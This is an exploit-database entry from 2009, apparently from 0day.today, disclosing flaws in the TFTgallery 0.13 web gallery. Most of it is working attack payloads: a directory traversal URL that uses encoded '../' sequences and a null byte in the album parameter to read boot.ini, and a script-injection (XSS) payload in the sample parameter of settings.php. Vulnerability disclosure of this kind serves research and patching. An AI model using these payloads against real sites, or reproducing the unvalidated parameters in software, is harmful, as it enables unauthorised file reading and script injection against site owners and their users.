TFTgallery .13 Directory Traversal Exploit

2009-11-02T00:00:00
ID 1337DAY-ID-9964
Type zdt
Reporter Blake
Modified 2009-11-02T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================================
TFTgallery .13 Directory Traversal Exploit
==========================================

Released information about the album parameter being vulnerable to XSS
earlier. Seems there are other similar issues:
 
The album parameter is vulnerable to directory transversal
 
http://example.com/tftgallery/index.php?album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&page=1<http://192.168.1.130/tftgallery/index.php?album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&page=1>
 
The sample parameter is vulnerable to XSS
 
http://example.com/tftgallery/settings.php?sample='></link><script>alert('blake
XSS test')</script>&name=cucumber%20cool
<http://192.168.1.130/tftgallery/settings.php?sample=>



#  0day.today [2018-01-02]  #